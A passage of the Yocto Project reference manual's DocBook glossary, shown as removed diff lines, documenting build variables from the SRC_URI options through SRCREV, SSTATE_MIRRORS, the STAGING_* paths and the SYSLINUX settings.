- </para></listitem>
- <listitem><para><emphasis><filename>minrev</filename> -</emphasis>
- Apply the patch only if <filename>SRCREV</filename>
- is equal to or greater than <filename>minrev</filename>.
- </para></listitem>
- <listitem><para><emphasis><filename>maxrev</filename> -</emphasis>
- Apply the patch only if <filename>SRCREV</filename>
- is not later than <filename>maxrev</filename>.
- </para></listitem>
- <listitem><para><emphasis><filename>rev</filename> -</emphasis>
- Apply the patch only if <filename>SRCREV</filename>
- is equal to <filename>rev</filename>.
- </para></listitem>
- <listitem><para><emphasis><filename>notrev</filename> -</emphasis>
- Apply the patch only if <filename>SRCREV</filename>
- is not equal to <filename>rev</filename>.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Here are some additional options worth mentioning:
- <itemizedlist>
- <listitem><para><emphasis><filename>unpack</filename> -</emphasis> Controls
- whether or not to unpack the file if it is an archive.
- The default action is to unpack the file.</para></listitem>
- <listitem><para><emphasis><filename>destsuffix</filename> -</emphasis> Places the file
- (or extracts its contents) into the specified
- subdirectory of <link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>
- when the Git fetcher is used.
- </para></listitem>
- <listitem><para><emphasis><filename>subdir</filename> -</emphasis> Places the file
- (or extracts its contents) into the specified
- subdirectory of <filename>WORKDIR</filename>
- when the local (<filename>file://</filename>)
- fetcher is used.
- </para></listitem>
- <listitem><para><emphasis><filename>localdir</filename> -</emphasis> Places the file
- (or extracts its contents) into the specified
- subdirectory of <filename>WORKDIR</filename> when
- the CVS fetcher is used.
- </para></listitem>
- <listitem><para><emphasis><filename>subpath</filename> -</emphasis>
- Limits the checkout to a specific subpath of the
- tree when using the Git fetcher is used.
- </para></listitem>
- <listitem><para><emphasis><filename>name</filename> -</emphasis> Specifies a
- name to be used for association with <filename>SRC_URI</filename> checksums
- when you have more than one file specified in <filename>SRC_URI</filename>.
- </para></listitem>
- <listitem><para><emphasis><filename>downloadfilename</filename> -</emphasis> Specifies
- the filename used when storing the downloaded file.</para></listitem>
- </itemizedlist>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SRC_URI_OVERRIDES_PACKAGE_ARCH'><glossterm>SRC_URI_OVERRIDES_PACKAGE_ARCH</glossterm>
- <info>
- SRC_URI_OVERRIDES_PACKAGE_ARCH[doc] = "By default, the OpenEmbedded build system automatically detects whether SRC_URI contains files that are machine-specific. If so, the build system automatically changes PACKAGE_ARCH. Setting this variable to '0' disables this behavior."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- By default, the OpenEmbedded build system automatically detects whether
- <filename><link linkend='var-SRC_URI'>SRC_URI</link></filename>
- contains files that are machine-specific.
- If so, the build system automatically changes
- <filename><link linkend='var-PACKAGE_ARCH'>PACKAGE_ARCH</link></filename>.
- Setting this variable to "0" disables this behavior.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SRCDATE'><glossterm>SRCDATE</glossterm>
- <info>
- SRCDATE[doc] = "The date of the source code used to build the package. This variable applies only if the source was fetched from a Source Code Manager (SCM)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The date of the source code used to build the package.
- This variable applies only if the source was fetched from a Source Code Manager (SCM).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SRCPV'><glossterm>SRCPV</glossterm>
- <info>
- SRCPV[doc] = "Returns the version string of the current package. This string is used to help define the value of PV."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Returns the version string of the current package.
- This string is used to help define the value of
- <link linkend='var-PV'><filename>PV</filename></link>.
- </para>
-
- <para>
- The <filename>SRCPV</filename> variable is defined in the
- <filename>meta/conf/bitbake.conf</filename> configuration
- file in the
- <link linkend='source-directory'>Source Directory</link>
- as follows:
- <literallayout class='monospaced'>
- SRCPV = "${@bb.fetch2.get_srcrev(d)}"
- </literallayout>
- </para>
-
- <para>
- Recipes that need to define <filename>PV</filename> do so
- with the help of the <filename>SRCPV</filename>.
- For example, the <filename>ofono</filename> recipe
- (<filename>ofono_git.bb</filename>) located in
- <filename>meta/recipes-connectivity</filename> in the
- Source Directory defines <filename>PV</filename> as
- follows:
- <literallayout class='monospaced'>
- PV = "0.12-git${SRCPV}"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SRCREV'><glossterm>SRCREV</glossterm>
- <info>
- SRCREV[doc] = "The revision of the source code used to build the package. This variable applies to Subversion, Git, Mercurial, and Bazaar only."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The revision of the source code used to build the package.
- This variable applies to Subversion, Git, Mercurial, and
- Bazaar only.
- Note that if you want to build a fixed revision and you
- want to avoid performing a query on the remote repository
- every time BitBake parses your recipe, you should specify
- a <filename>SRCREV</filename> that is a
- full revision identifier and not just a tag.
- <note>
- For information on limitations when inheriting the
- latest revision of software using
- <filename>SRCREV</filename>, see the
- <link linkend='var-AUTOREV'><filename>AUTOREV</filename></link>
- variable description and the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#automatically-incrementing-a-binary-package-revision-number'>Automatically Incrementing a Binary Package Revision Number</ulink>"
- section, which is in the Yocto Project Development
- Tasks Manual.
- </note>
- </para>
-
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SSTATE_DIR'><glossterm>SSTATE_DIR</glossterm>
- <info>
- SSTATE_DIR[doc] = "The directory for the shared state cache."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The directory for the shared state cache.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SSTATE_MIRROR_ALLOW_NETWORK'><glossterm>SSTATE_MIRROR_ALLOW_NETWORK</glossterm>
- <info>
- SSTATE_MIRROR_ALLOW_NETWORK[doc] = "If set to "1", allows fetches from mirrors that are specified in SSTATE_MIRRORS to work even when fetching from the network is disabled by setting BB_NO_NETWORK to "1"."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- If set to "1", allows fetches from
- mirrors that are specified in
- <link linkend='var-SSTATE_MIRRORS'><filename>SSTATE_MIRRORS</filename></link>
- to work even when fetching from the network is
- disabled by setting <filename>BB_NO_NETWORK</filename>
- to "1".
- Using the
- <filename>SSTATE_MIRROR_ALLOW_NETWORK</filename>
- variable is useful if you have set
- <filename>SSTATE_MIRRORS</filename> to point to an
- internal server for your shared state cache, but
- you want to disable any other fetching from the network.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SSTATE_MIRRORS'><glossterm>SSTATE_MIRRORS</glossterm>
- <info>
- SSTATE_MIRRORS[doc] = "Configures the OpenEmbedded build system to search other mirror locations for prebuilt cache data objects before building out the data. You can specify a filesystem directory or a remote URL such as HTTP or FTP."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Configures the OpenEmbedded build system to search other
- mirror locations for prebuilt cache data objects before
- building out the data.
- This variable works like fetcher
- <link linkend='var-MIRRORS'><filename>MIRRORS</filename></link>
- and <link linkend='var-PREMIRRORS'><filename>PREMIRRORS</filename></link>
- and points to the cache locations to check for the shared
- state (sstate) objects.
- </para>
-
- <para>
- You can specify a filesystem directory or a remote URL such
- as HTTP or FTP.
- The locations you specify need to contain the shared state
- cache (sstate-cache) results from previous builds.
- The sstate-cache you point to can also be from builds on
- other machines.
- </para>
-
- <para>
- When pointing to sstate build artifacts on another machine
- that uses a different GCC version for native builds,
- you must configure <filename>SSTATE_MIRRORS</filename>
- with a regular expression that maps local search paths
- to server paths.
- The paths need to take into account
- <link linkend='var-NATIVELSBSTRING'><filename>NATIVELSBSTRING</filename></link>
- set by the
- <link linkend='ref-classes-uninative'><filename>uninative</filename></link>
- class.
- For example, the following maps the local search path
- <filename>universal-4.9</filename> to the server-provided
- path <replaceable>server_url_sstate_path</replaceable>:
- <literallayout class='monospaced'>
- SSTATE_MIRRORS ?= file://universal-4.9/(.*) http://<replaceable>server_url_sstate_path</replaceable>/universal-4.8/\1 \n
- </literallayout>
- </para>
-
- <para>
- If a mirror uses the same structure as
- <link linkend='var-SSTATE_DIR'><filename>SSTATE_DIR</filename></link>,
- you need to add
- "PATH" at the end as shown in the examples below.
- The build system substitutes the correct path within the
- directory structure.
- <literallayout class='monospaced'>
- SSTATE_MIRRORS ?= "\
- file://.* http://<replaceable>someserver</replaceable>.tld/share/sstate/PATH;downloadfilename=PATH \n \
- file://.* file:///<replaceable>some-local-dir</replaceable>/sstate/PATH"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SSTATE_SCAN_FILES'><glossterm>SSTATE_SCAN_FILES</glossterm>
- <info>
- SSTATE_SCAN_FILES[doc] = "Controls the list of files the OpenEmbedded build system scans for hardcoded installation paths."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Controls the list of files the OpenEmbedded build system
- scans for hardcoded installation paths. The variable uses a
- space-separated list of filenames (not paths) with standard
- wildcard characters allowed.
- </para>
-
- <para>
- During a build, the OpenEmbedded build system creates a
- shared state (sstate) object during the first stage of
- preparing the sysroots. That object is scanned for
- hardcoded paths for original installation locations.
- The list of files that are scanned for paths is controlled
- by the <filename>SSTATE_SCAN_FILES</filename> variable.
- Typically, recipes add files they want to be scanned to the
- value of <filename>SSTATE_SCAN_FILES</filename> rather than
- the variable being comprehensively set. The
- <link linkend='ref-classes-sstate'><filename>sstate</filename></link>
- class specifies the default list of files.
- </para>
-
- <para>
- For details on the process, see the
- <link linkend='ref-classes-staging'><filename>staging</filename></link>
- class.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STAGING_BASE_LIBDIR_NATIVE'><glossterm>STAGING_BASE_LIBDIR_NATIVE</glossterm>
- <info>
- STAGING_BASE_LIBDIR_NATIVE[doc] = "Specifies the path to the /lib subdirectory of the sysroot directory for the build host."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the path to the <filename>/lib</filename>
- subdirectory of the sysroot directory for the
- build host.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STAGING_BASELIBDIR'><glossterm>STAGING_BASELIBDIR</glossterm>
- <info>
- STAGING_BASELIBDIR[doc] = "Specifies the path to the /lib subdirectory of the sysroot directory for the target for which the current recipe is being built (STAGING_DIR_HOST)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the path to the <filename>/lib</filename>
- subdirectory of the sysroot directory for the target
- for which the current recipe is being built
- (<link linkend='var-STAGING_DIR_HOST'><filename>STAGING_DIR_HOST</filename></link>).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STAGING_BINDIR'><glossterm>STAGING_BINDIR</glossterm>
- <info>
- STAGING_BINDIR[doc] = "Specifies the path to the /usr/bin subdirectory of the sysroot directory for the target for which the current recipe is being built (STAGING_DIR_HOST)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the path to the
- <filename>/usr/bin</filename> subdirectory of the
- sysroot directory for the target for which the current
- recipe is being built
- (<link linkend='var-STAGING_DIR_HOST'><filename>STAGING_DIR_HOST</filename></link>).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STAGING_BINDIR_CROSS'><glossterm>STAGING_BINDIR_CROSS</glossterm>
- <info>
- STAGING_BINDIR_CROSS[doc] = "Specifies the path to the directory containing binary configuration scripts. These scripts provide configuration information for other software that wants to make use of libraries or include files provided by the software associated with the script."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the path to the directory containing binary
- configuration scripts.
- These scripts provide configuration information for
- other software that wants to make use of libraries or
- include files provided by the software associated with
- the script.
- <note>
- This style of build configuration has been largely
- replaced by <filename>pkg-config</filename>.
- Consequently, if <filename>pkg-config</filename>
- is supported by the library to which you are linking,
- it is recommended you use
- <filename>pkg-config</filename> instead of a
- provided configuration script.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STAGING_BINDIR_NATIVE'><glossterm>STAGING_BINDIR_NATIVE</glossterm>
- <info>
- STAGING_BINDIR_NATIVE[doc] = "Specifies the path to the /usr/bin subdirectory of the sysroot directory for the build host."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the path to the
- <filename>/usr/bin</filename> subdirectory of the
- sysroot directory for the build host.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STAGING_DATADIR'><glossterm>STAGING_DATADIR</glossterm>
- <info>
- STAGING_DATADIR[doc] = "Specifies the path to the /usr/share subdirectory of the sysroot directory for the target for which the current recipe is being built (STAGING_DIR_HOST)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the path to the <filename>/usr/share</filename>
- subdirectory of the sysroot directory for the target
- for which the current recipe is being built
- (<link linkend='var-STAGING_DIR_HOST'><filename>STAGING_DIR_HOST</filename></link>).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STAGING_DATADIR_NATIVE'><glossterm>STAGING_DATADIR_NATIVE</glossterm>
- <info>
- STAGING_DATADIR_NATIVE[doc] = "Specifies the path to the /usr/share subdirectory of the sysroot directory for the build host."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the path to the <filename>/usr/share</filename>
- subdirectory of the sysroot directory for the build host.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STAGING_DIR'><glossterm>STAGING_DIR</glossterm>
- <info>
- STAGING_DIR[doc] = "Helps construct the recipe-sysroots directory, which is used during packaging."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Helps construct the <filename>recipe-sysroots</filename>
- directory, which is used during packaging.
- </para>
-
- <para>
- For information on how staging for recipe-specific
- sysroots occurs, see the
- <link linkend='ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></link>
- task, the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#new-sharing-files-between-recipes'>Sharing Files Between Recipes</ulink>"
- section in the Yocto Project Development Tasks Manual, the
- "<ulink url='&YOCTO_DOCS_OM_URL;#configuration-compilation-and-staging-dev-environment'>Configuration, Compilation, and Staging</ulink>"
- section in the Yocto Project Overview and Concepts Manual,
- and the
- <link linkend='var-SYSROOT_DIRS'><filename>SYSROOT_DIRS</filename></link>
- variable.
- <note>
- Recipes should never write files directly under
- the <filename>STAGING_DIR</filename> directory because
- the OpenEmbedded build system
- manages the directory automatically.
- Instead, files should be installed to
- <filename>${</filename><link linkend='var-D'><filename>D</filename></link><filename>}</filename>
- within your recipe's
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>
- task and then the OpenEmbedded build system will
- stage a subset of those files into the sysroot.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STAGING_DIR_HOST'><glossterm>STAGING_DIR_HOST</glossterm>
- <info>
- STAGING_DIR_HOST[doc] = "Specifies the path to the sysroot directory for the system that the component is built to run on."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the path to the sysroot directory for the system
- on which the component is built to run (the system that
- hosts the component).
- For most recipes, this sysroot is the one in which that
- recipe's
- <link linkend='ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></link>
- task copies files.
- Exceptions include <filename>-native</filename> recipes,
- where the <filename>do_populate_sysroot</filename> task
- instead uses
- <link linkend='var-STAGING_DIR_NATIVE'><filename>STAGING_DIR_NATIVE</filename></link>.
- Depending on the type of recipe and the build target,
- <filename>STAGING_DIR_HOST</filename> can have the
- following values:
- <itemizedlist>
- <listitem><para>
- For recipes building for the target machine, the
- value is
- "${<link linkend='var-STAGING_DIR'>STAGING_DIR</link>}/${<link linkend='var-MACHINE'>MACHINE</link>}".
- </para></listitem>
- <listitem><para>
- For native recipes building for the build host, the
- value is empty given the assumption that when
- building for the build host, the build host's own
- directories should be used.
- <note>
- <para><filename>-native</filename> recipes are
- not installed into host paths like such as
- <filename>/usr</filename>.
- Rather, these recipes are installed into
- <filename>STAGING_DIR_NATIVE</filename>.
- When compiling <filename>-native</filename>
- recipes, standard build environment variables
- such as
- <link linkend='var-CPPFLAGS'><filename>CPPFLAGS</filename></link>
- and
- <link linkend='var-CFLAGS'><filename>CFLAGS</filename></link>
- are set up so that both host paths and
- <filename>STAGING_DIR_NATIVE</filename> are
- searched for libraries and headers using, for
- example, GCC's <filename>-isystem</filename>
- option.</para>
-
- <para>Thus, the emphasis is that the
- <filename>STAGING_DIR*</filename> variables
- should be viewed as input variables by tasks
- such as
- <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>,
- <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>,
- and
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>.
- Having the real system root correspond to
- <filename>STAGING_DIR_HOST</filename> makes
- conceptual sense for
- <filename>-native</filename> recipes, as
- they make use of host headers and libraries.
- </para>
- </note>
- </para></listitem>
- </itemizedlist>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STAGING_DIR_NATIVE'><glossterm>STAGING_DIR_NATIVE</glossterm>
- <info>
- STAGING_DIR_NATIVE[doc] = "Specifies the path to the sysroot directory used when building components that run on the build host itself."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the path to the sysroot directory used when
- building components that run on the build host itself.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STAGING_DIR_TARGET'><glossterm>STAGING_DIR_TARGET</glossterm>
- <info>
- STAGING_DIR_TARGET[doc] = "Specifies the path to the sysroot used for the system for which the component generates code."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the path to the sysroot used for the system for
- which the component generates code.
- For components that do not generate code, which is the
- majority, <filename>STAGING_DIR_TARGET</filename> is set
- to match
- <link linkend='var-STAGING_DIR_HOST'><filename>STAGING_DIR_HOST</filename></link>.
- </para>
-
- <para>
- Some recipes build binaries that can run on the target
- system but those binaries in turn generate code for
- another different system (e.g. cross-canadian recipes).
- Using terminology from GNU, the primary system is referred
- to as the "HOST" and the secondary, or different, system is
- referred to as the "TARGET".
- Thus, the binaries run on the "HOST" system
- and generate binaries for the "TARGET" system.
- The <filename>STAGING_DIR_HOST</filename> variable points
- to the sysroot used for the "HOST" system, while
- <filename>STAGING_DIR_TARGET</filename>
- points to the sysroot used for the "TARGET" system.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STAGING_ETCDIR_NATIVE'><glossterm>STAGING_ETCDIR_NATIVE</glossterm>
- <info>
- STAGING_ETCDIR_NATIVE[doc] = "Specifies the path to the /etc subdirectory of the sysroot directory for the build host."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the path to the <filename>/etc</filename>
- subdirectory of the sysroot directory for the
- build host.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STAGING_EXECPREFIXDIR'><glossterm>STAGING_EXECPREFIXDIR</glossterm>
- <info>
- STAGING_EXECPREFIXDIR[doc] = "Specifies the path to the /usr subdirectory of the sysroot directory for the target for which the current recipe is being built (STAGING_DIR_HOST)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the path to the <filename>/usr</filename>
- subdirectory of the sysroot directory for the target
- for which the current recipe is being built
- (<link linkend='var-STAGING_DIR_HOST'><filename>STAGING_DIR_HOST</filename></link>).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STAGING_INCDIR'><glossterm>STAGING_INCDIR</glossterm>
- <info>
- STAGING_INCDIR[doc] = "Specifies the path to the /usr/include subdirectory of the sysroot directory for the target for which the current recipe being built (STAGING_DIR_HOST)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the path to the
- <filename>/usr/include</filename> subdirectory of the
- sysroot directory for the target for which the current
- recipe being built
- (<link linkend='var-STAGING_DIR_HOST'><filename>STAGING_DIR_HOST</filename></link>).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STAGING_INCDIR_NATIVE'><glossterm>STAGING_INCDIR_NATIVE</glossterm>
- <info>
- STAGING_INCDIR_NATIVE[doc] = "Specifies the path to the /usr/include subdirectory of the sysroot directory for the build host."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the path to the <filename>/usr/include</filename>
- subdirectory of the sysroot directory for the build host.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STAGING_KERNEL_BUILDDIR'><glossterm>STAGING_KERNEL_BUILDDIR</glossterm>
- <info>
- STAGING_KERNEL_BUILDDIR[doc] = "Points to the directory containing the kernel build artifacts."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Points to the directory containing the kernel build
- artifacts.
- Recipes building software that needs to access kernel
- build artifacts
- (e.g. <filename>systemtap-uprobes</filename>) can look in
- the directory specified with the
- <filename>STAGING_KERNEL_BUILDDIR</filename> variable to
- find these artifacts after the kernel has been built.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STAGING_KERNEL_DIR'><glossterm>STAGING_KERNEL_DIR</glossterm>
- <info>
- STAGING_KERNEL_DIR[doc] = "The directory with kernel headers that are required to build out-of-tree modules."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The directory with kernel headers that are required to build out-of-tree
- modules.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STAGING_LIBDIR'><glossterm>STAGING_LIBDIR</glossterm>
- <info>
- STAGING_LIBDIR[doc] = "Specifies the path to the /usr/lib subdirectory of the sysroot directory for the target for which the current recipe is being built (STAGING_DIR_HOST)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the path to the <filename>/usr/lib</filename>
- subdirectory of the sysroot directory for the target for
- which the current recipe is being built
- (<link linkend='var-STAGING_DIR_HOST'><filename>STAGING_DIR_HOST</filename></link>).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STAGING_LIBDIR_NATIVE'><glossterm>STAGING_LIBDIR_NATIVE</glossterm>
- <info>
- STAGING_LIBDIR_NATIVE[doc] = "Specifies the path to the /usr/lib subdirectory of the sysroot directory for the build host."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the path to the <filename>/usr/lib</filename>
- subdirectory of the sysroot directory for the build host.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STAMP'><glossterm>STAMP</glossterm>
- <info>
- STAMP[doc] = "Specifies the base path used to create recipe stamp files. The path to an actual stamp file is constructed by evaluating this string and then appending additional information."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the base path used to create recipe stamp files.
- The path to an actual stamp file is constructed by evaluating this
- string and then appending additional information.
- Currently, the default assignment for <filename>STAMP</filename>
- as set in the <filename>meta/conf/bitbake.conf</filename> file
- is:
- <literallayout class='monospaced'>
- STAMP = "${STAMPS_DIR}/${MULTIMACH_TARGET_SYS}/${PN}/${EXTENDPE}${PV}-${PR}"
- </literallayout>
- </para>
-
- <para>
- For information on how BitBake uses stamp files to determine
- if a task should be rerun, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#stamp-files-and-the-rerunning-of-tasks'>Stamp Files and the Rerunning of Tasks</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
-
- <para>
- See <link linkend='var-STAMPS_DIR'><filename>STAMPS_DIR</filename></link>,
- <link linkend='var-MULTIMACH_TARGET_SYS'><filename>MULTIMACH_TARGET_SYS</filename></link>,
- <link linkend='var-PN'><filename>PN</filename></link>,
- <link linkend='var-EXTENDPE'><filename>EXTENDPE</filename></link>,
- <link linkend='var-PV'><filename>PV</filename></link>, and
- <link linkend='var-PR'><filename>PR</filename></link> for related variable
- information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STAMPS_DIR'><glossterm>STAMPS_DIR</glossterm>
- <info>
- STAMPS_DIR[doc] = "Specifies the base directory in which the OpenEmbedded build system places stamps."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the base directory in which the OpenEmbedded
- build system places stamps.
- The default directory is
- <filename>${TMPDIR}/stamps</filename>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-STRIP'><glossterm>STRIP</glossterm>
- <info>
- STRIP[doc] = "Minimal command and arguments to run 'strip' (strip symbols)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The minimal command and arguments to run
- <filename>strip</filename>, which is used to strip
- symbols.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SUMMARY'><glossterm>SUMMARY</glossterm>
- <info>
- SUMMARY[doc] = "The short (80 characters or less) summary of the binary package for packaging systems such as opkg, rpm, or dpkg. By default, SUMMARY is used to define the DESCRIPTION variable if DESCRIPTION is not set in the recipe."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The short (72 characters or less) summary of the binary package for packaging
- systems such as <filename>opkg</filename>, <filename>rpm</filename>, or
- <filename>dpkg</filename>.
- By default, <filename>SUMMARY</filename> is used to define
- the <link linkend='var-DESCRIPTION'><filename>DESCRIPTION</filename></link>
- variable if <filename>DESCRIPTION</filename> is not set
- in the recipe.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SVNDIR'><glossterm>SVNDIR</glossterm>
- <info>
- SVNDIR[doc] = "The directory where Subversion checkouts are stored."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The directory in which files checked out of a Subversion
- system are stored.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SYSLINUX_DEFAULT_CONSOLE'><glossterm>SYSLINUX_DEFAULT_CONSOLE</glossterm>
- <info>
- SYSLINUX_DEFAULT_CONSOLE[doc] = "Specifies the kernel boot default console."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the kernel boot default console.
- If you want to use a console other than the default,
- set this variable in your recipe as follows where "X" is
- the console number you want to use:
- <literallayout class='monospaced'>
- SYSLINUX_DEFAULT_CONSOLE = "console=ttyX"
- </literallayout>
- </para>
-
- <para>
- The
- <link linkend='ref-classes-syslinux'><filename>syslinux</filename></link>
- class initially sets this variable to null but then checks
- for a value later.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SYSLINUX_OPTS'><glossterm>SYSLINUX_OPTS</glossterm>
- <info>
- SYSLINUX_OPTS[doc] = "Lists additional options to add to the syslinux file."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Lists additional options to add to the syslinux file.
- You need to set this variable in your recipe.
- If you want to list multiple options, separate the options
- with a semicolon character (<filename>;</filename>).
- </para>
-
- <para>
- The
- <link linkend='ref-classes-syslinux'><filename>syslinux</filename></link>
- class uses this variable to create a set of options.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SYSLINUX_SERIAL'><glossterm>SYSLINUX_SERIAL</glossterm>
- <info>
- SYSLINUX_SERIAL[doc] = "Specifies the alternate serial port or turns it off."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the alternate serial port or turns it off.
- To turn off serial, set this variable to an empty string
- in your recipe.
- The variable's default value is set in the
- <link linkend='ref-classes-syslinux'><filename>syslinux</filename></link>
- class as follows:
- <literallayout class='monospaced'>
- SYSLINUX_SERIAL ?= "0 115200"
- </literallayout>
- </para>
-
- <para>
- The class checks for and uses the variable as needed.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SYSLINUX_SPLASH'><glossterm>SYSLINUX_SPLASH</glossterm>
- <info>
- SYSLINUX_SPLASH[doc] = "An .LSS file used as the background for the VGA boot menu when you use the boot menu."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- An <filename>.LSS</filename> file used as the background
- for the VGA boot menu when you use the boot menu.
- You need to set this variable in your recipe.
- </para>
-
- <para>
- The
- <link linkend='ref-classes-syslinux'><filename>syslinux</filename></link>
- class checks for this variable and if found, the
- OpenEmbedded build system installs the splash screen.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SYSLINUX_SERIAL_TTY'><glossterm>SYSLINUX_SERIAL_TTY</glossterm>
- <info>
- SYSLINUX_SERIAL_TTY[doc] = "Specifies the alternate console=tty... kernel boot argument."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the alternate console=tty... kernel boot argument.
- The variable's default value is set in the
- <link linkend='ref-classes-syslinux'><filename>syslinux</filename></link>
- class as follows:
- <literallayout class='monospaced'>
- SYSLINUX_SERIAL_TTY ?= "console=ttyS0,115200"
- </literallayout>
- </para>
-
- <para>
- The class checks for and uses the variable as needed.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SYSROOT_DESTDIR'><glossterm>SYSROOT_DESTDIR</glossterm>
- <info>
- SYSROOT_DESTDIR[doc] = "Points to the temporary work directory (default ${WORKDIR}/sysroot-destdir) where the files populated into the sysroot are assembled during the do_populate_sysroot task."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Points to the temporary directory under the work directory
- (default
- "<filename>${</filename><link linkend='var-WORKDIR'><filename>WORKDIR</filename></link><filename>}/sysroot-destdir</filename>")
- where the files populated into the sysroot are assembled
- during the
- <link linkend='ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></link>
- task.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SYSROOT_DIRS'><glossterm>SYSROOT_DIRS</glossterm>
- <info>
- SYSROOT_DIRS[doc] = "Directories that are staged into the sysroot by the do_populate_sysroot task."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Directories that are staged into the sysroot by the
- <link linkend='ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></link>
- task.
- By default, the following directories are staged:
- <literallayout class='monospaced'>
- SYSROOT_DIRS = " \
- ${includedir} \
- ${libdir} \
- ${base_libdir} \
- ${nonarch_base_libdir} \
- ${datadir} \
- "
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SYSROOT_DIRS_BLACKLIST'><glossterm>SYSROOT_DIRS_BLACKLIST</glossterm>
- <info>
- SYSROOT_DIRS_BLACKLIST[doc] = "Directories that are not staged into the sysroot by the do_populate_sysroot task."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Directories that are not staged into the sysroot by the
- <link linkend='ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></link>
- task.
- You can use this variable to exclude certain subdirectories
- of directories listed in
